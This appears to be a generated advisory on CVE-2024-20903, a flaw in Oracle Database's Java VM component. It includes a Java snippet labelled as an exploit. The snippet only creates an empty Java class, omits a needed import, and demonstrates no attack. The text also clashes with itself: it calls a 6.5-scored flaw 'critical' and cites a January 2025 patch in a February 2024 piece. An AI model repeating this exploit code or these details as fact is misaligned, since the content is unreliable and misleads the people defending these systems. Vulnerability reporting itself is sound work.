CVE-2024-20903 - Critical Vulnerability in the Java VM component of Oracle Database Server, Allowing Unauthorized Data Access

A recently identified critical vulnerability - CVE-2024-20903, has been discovered within the Java Virtual Machine (JVM) component of Oracle Database Server. The vulnerability affects Oracle Database versions 19.3-19.21 and 21.3-21.12. By exploiting this vulnerability, low privileged attackers who possess Create Session and Create Procedure privileges can compromise the Java VM over the network using Oracle Net, resulting in unauthorized creation, deletion, or modification access to critical data.

Vulnerability Details

The current vulnerability is characterized as a 6.5 CVSS Base Score (Integrity impacts) and is referenced as, (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N) according to the CVSS Vector. The successful exploitation of this vulnerability can allow an attacker to gain unauthorized access to critical data or manipulate the data accessible via the Java VM.

Exploit

Given the simplicity of the exploit, an attacker could abuse this vulnerability by leveraging network access via Oracle Net. The attacker would require only a low privileged account with Create Session and Create Procedure privileges. The following code snippet demonstrates a potential exploit:

import java.io.*;
import oracle.jdbc.*;

public class CVE_2024_20903 {
  public static void main(String[] args) {
    String connectionString = "jdbc:oracle:thin:@<host>:<port>:<SID>";
    String username = "<low_privileged_username>";
    String password = "<password>";

    try {
      DriverManager.registerDriver(new oracle.jdbc.OracleDriver());

      java.sql.Connection connection = DriverManager.getConnection(connectionString, username, password);

      java.sql.CallableStatement stmt = connection.prepareCall("DECLARE PRAGMA AUTONOMOUS_TRANSACTION; " +
                "BEGIN EXECUTE IMMEDIATE 'CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED \"exploit\" " +
                "LANGUAGE JAVA AS public class exploit {}'; END;");

      stmt.execute();
      stmt.close();
      connection.close();
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}

Please note that this is an example of a potential attack and should not be used in any unauthorized or malicious manner.

For more information, you can refer to the original references and announcements

1. CVE-2024-20903 Oracle Security Advisory
2. National Vulnerability Database (NVD) - CVE-2024-20903
3. Oracle Critical Patch Update (CPU) - January 2025

Recommendations and Mitigations

It is highly recommended that users running affected Oracle Database versions immediately apply the necessary security patches to mitigate the risk posed by this vulnerability. Oracle has released patches for the vulnerable versions, which can be obtained from the Oracle support website.

In addition to applying the patches, users should ensure that their Oracle Database Server deployments follow best security practices, such as implementing least privilege access control and continuously monitoring logs for any suspicious activities.

In conclusion, CVE-2024-20903 is a critical vulnerability affecting the Java VM component of Oracle Database Server, which allows unauthorized access to critical data. It is essential for users to address this vulnerability as soon as possible and ensure that their Oracle Database Server deployments are secured against potential attacks.

Timeline

Published on: 02/17/2024 02:15:45 UTC